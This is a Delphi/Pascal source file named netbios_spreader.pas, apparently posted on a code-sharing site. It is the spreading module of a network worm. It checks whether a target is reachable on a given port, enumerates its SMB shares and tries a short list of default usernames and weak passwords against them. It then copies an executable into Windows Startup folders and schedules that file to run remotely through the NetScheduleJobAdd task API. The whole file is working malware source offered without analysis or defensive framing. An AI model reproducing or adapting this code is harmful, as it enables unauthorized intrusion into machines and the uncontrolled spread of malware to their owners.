📄 netbios_spreader.pas
字号:
UNIT netbios_spreader;
INTERFACE
uses
Windows,
Winsock,
WinInet;
Const
NETBIOS_MAX_PASSWORD = 2;
NETBIOS_PASSWORD: ARRAY [0..NETBIOS_MAX_PASSWORD] OF STRING = (
'','1234','password');
NETBIOS_PATHSIZE = 4;
NETBIOS_PATH: ARRAY [1..NETBIOS_PATHSIZE] OF STRING = (
'\',
'\Documents and Settings\All Users\Start Menu\Programs\Startup\',
'\WINDOWS\Start Menu\Programs\Startup\',
'\WINNT\Profiles\All Users\Start Menu\Programs\Startup\');
NETBIOS_MAX_USERNAME = 3;
NETBIOS_USERNAME: ARRAY [0..NETBIOS_MAX_USERNAME] OF STRING = (
'Guest', 'Administrator', 'Owner', 'Root');
VAR
lpNetApiBufferFree : FUNCTION(Buffer:Pointer) : DWORD;STDCALL;
lpNetRemoteTOD : FUNCTION(UNCServerName:pChar;BufferPtr:pByte) : DWORD;STDCALL;
lpNetScheduleJobAdd : FUNCTION(ServerName:pChar;Buffer:pByte;VAR JobID:DWORD) : DWORD;STDCALL;
OLD_NetShareEnum : FUNCTION(pszServer:pChar;sLevel:SmallInt;VAR Bufptr;cbBuffer:Cardinal;VAR pcEntriesRead,pcTotalAvail:Cardinal) : DWORD; STDCALL;
NT_NetShareEnum : FUNCTION(ServerName:pWideChar;Level:DWORD;VAR Bufptr;Prefmaxlen:DWORD;VAR EntriesRead,TotalEntries,resume_handle:DWORD) : DWORD; STDCALL;
PROCEDURE InitNETAPIFunctions;
Function NetbiosRoot(szIPAddr: String; Port: Integer): Boolean;
IMPLEMENTATION
CONST
NERR_SUCCESS = 0;
STYPE_PRINTQ = 1;
FUNCTION DirectoryExists(CONST Dir:STRING) : BOOL;
VAR
Attr : DWORD;
BEGIN
Attr:=GetFileAttributes(pChar(Dir));
Result:=(Attr<>$FFFFFFFF)AND(Attr AND FILE_ATTRIBUTE_DIRECTORY=FILE_ATTRIBUTE_DIRECTORY);
END;
PROCEDURE NetRemoteExecute(szLocation, szRemoteAddr:STRING);
TYPE
PTIME_OF_DAY_INFO = ^TTIME_OF_DAY_INFO;
TTIME_OF_DAY_INFO = RECORD
tod_elapsedt : DWORD;
tod_msecs : DWORD;
tod_hours : DWORD;
tod_mins : DWORD;
tod_secs : DWORD;
tod_hunds : DWORD;
tod_timezone : LongInt;
tod_tinterval : DWORD;
tod_day : DWORD;
tod_month : DWORD;
tod_year : DWORD;
tod_weekday : DWORD;
END;
AT_INFO = RECORD
JobTime : DWORD;
DaysOfMonth : DWORD;
DaysOfWeek : UCHAR;
Flags : UCHAR;
Command : pWideChar;
END;
VAR
JobID : DWORD;
dwRemoteTime : DWORD;
dwReturn : DWORD;
NetAT : AT_INFO;
wcCmd : PWideChar;
wcServer : PWideChar;
lpNetTOD : PTIME_OF_DAY_INFO;
BEGIN
GetMem(wcCmd,1024+1);
GetMem(wcServer,256+1);
lpNetTOD:=NIL;
StringToWideChar(szRemoteAddr,wcServer,256);
StringToWideChar(szLocation,wcCmd,1024);
dwReturn:=lpNetRemoteTOD(pChar(szRemoteAddr),@lpNetTOD);
IF dwReturn=NERR_Success THEN
BEGIN
dwRemoteTime:=(lpNetTOD.tod_hours*3600+lpNetTOD.tod_mins*60+lpNetTOD.tod_secs)*1000+lpNetTOD.tod_hunds*10;
IF (lpNetTOD.tod_timezone <> -1) Then
dwRemoteTime := dwRemoteTime - lpNetTOD.tod_timezone * 60000;
dwRemoteTime:=dwRemoteTime+60000; //* add two minutes to current remote time
lpNetApiBufferFree(lpNetTOD);
ZeroMemory(@NetAT,SizeOf(NetAT));
NetAT.JobTime:=dwRemoteTime;
NetAT.Command:=wcCmd;
lpNetScheduleJobAdd(pChar(wcServer),@NetAT,JobID);
END;
FreeMem(wcCmd);
FreeMem(wcServer);
END;
FUNCTION InfectSharedResource(szRemoteName, szRemoteAddr:STRING) : BOOL;
VAR
MaxUserName : WORD;
MaxPassword : WORD;
I : DWORD;
dwRet : DWORD;
szFullPath : STRING;
nK : Integer;
nL : Integer;
nN : Integer;
NetResource : TNetResource;
BEGIN
Result:=False;
szRemoteName:=szRemoteAddr+'\'+szRemoteName;
NetResource.dwType:=RESOURCETYPE_DISK;
NetResource.lpLocalName:=NIL;
NetResource.lpRemoteName:=pChar(szRemoteName);
NetResource.lpProvider:=NIL;
GetModuleFileName(GetModuleHandle(NIL),pChar(szFullPath),Length(szFullPath));
MaxUserName:=NETBIOS_MAX_USERNAME;
MaxPassword:=NETBIOS_MAX_PASSWORD;
FOR nK:=0 TO MaxUserName DO BEGIN
FOR nL:=0 TO MaxPassword DO BEGIN
dwRet:=WNetAddConnection2(NetResource,pChar(NETBIOS_PASSWORD[nL]),pChar(NETBIOS_USERNAME[nK]),0);
IF dwRet=NO_ERROR THEN BEGIN
FOR I:=1 TO NETBIOS_PATHSIZE DO BEGIN
IF DirectoryExists(NetResource.lpRemoteName+NETBIOS_PATH[I]) THEN BEGIN
IF CopyFile(pChar('a.exe'),pChar(szRemoteName+NETBIOS_PATH[I]+'Install.exe'),False) THEN BEGIN
NetRemoteExecute(szRemoteName+NETBIOS_PATH[I]+'Install.exe', szRemoteAddr);
Result:=True;
END;
END;
END;
FOR nN:=0 TO 20 DO IF WNetCancelConnection(NetResource.lpRemoteName,True)=NO_ERROR THEN Break;
END;
END;
END;
END;
FUNCTION EnumShare(szRemoteAddr: String): BOOL;
TYPE
Share_INFO_1 = RECORD
shi1_netname : PWideChar;
shi1_type : DWORD;
shi1_remark : LPTSTR;
END;
LPShare_INFO_1 =^Share_INFO_1;
VAR
dwK : DWORD;
hResume : DWORD;
dwReturn : DWORD;
dwReadEntires : DWORD;
dwTotalEntires : DWORD;
szShareName : STRING;
wcRemoteAddr : pWideChar;
lpShareInfo : LPSHARE_INFO_1;
lpCurrentInfo : LPSHARE_INFO_1;
BEGIN
Result:=False;
GetMem(wcRemoteAddr,MAX_PATH);
StringToWideChar(szRemoteAddr,wcRemoteAddr,MAX_PATH);
hResume:=0;
REPEAT
lpShareInfo:=NIL;
dwReturn:=NT_NetShareEnum(wcRemoteAddr,1,lpShareInfo,8192,dwReadEntires,dwTotalEntires,hResume);
IF(dwReturn<>ERROR_MORE_DATA)AND(dwReturn<>ERROR_SUCCESS) THEN Break;
lpCurrentInfo:=lpShareInfo;
FOR dwK:=0 TO dwReadEntires-1 DO BEGIN
szShareName:=lpCurrentInfo.shi1_netname;
IF lpcurrentinfo.shi1_type<>STYPE_PRINTQ THEN Result:=InfectSharedResource(szShareName, szRemoteAddr);
Inc(lpCurrentInfo);
END;
lpNetAPIBufferFree(lpShareInfo);
UNTIL dwReturn<>ERROR_MORE_DATA;
FreeMem(wcRemoteAddr);
END;
Function NetbiosRoot(szIPAddr: String; Port: Integer): Boolean;
VAR
R : BOOL;
Sock : TSocket;
SockAddr : TSockAddrIn;
szRemoteAddr : String;
WSA : TWSAData;
BEGIN
Result := False;
R := False;
WSAStartUP($101, WSA);
Sock:=Socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
SockAddr.sin_family:=AF_INET;
SockAddr.sin_port:=htons(Port);
SockAddr.sin_addr.S_addr:=inet_addr(pChar(szIPAddr));
IF connect(Sock,SockAddr,SizeOf(SockAddr))<>SOCKET_ERROR THEN
BEGIN
CloseSocket(Sock);
szRemoteAddr:='\\'+szIPAddr;
R:=EnumShare(szRemoteAddr);
END;
WSACleanUP();
IF R THEN Result := TRUE;
END;
PROCEDURE InitNETAPIFunctions;
VAR
NETAPI32 : Thandle;
BEGIN
NETAPI32:=LoadLibrary('netapi32.dll');
lpNetRemoteTOD:=GetProcAddress(NETAPI32,'NetRemoteTOD');
lpNetScheduleJobAdd:=GetProcAddress(NETAPI32,'NetScheduleJobAdd');
NT_NetShareEnum:=GetProcAddress(NETAPI32,'NetShareEnum');
lpNetAPIBufferFree:=GetProcAddress(NETAPI32,'NetApiBufferFree');
END;
INITIALIZATION
InitNETAPIFunctions;
END.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -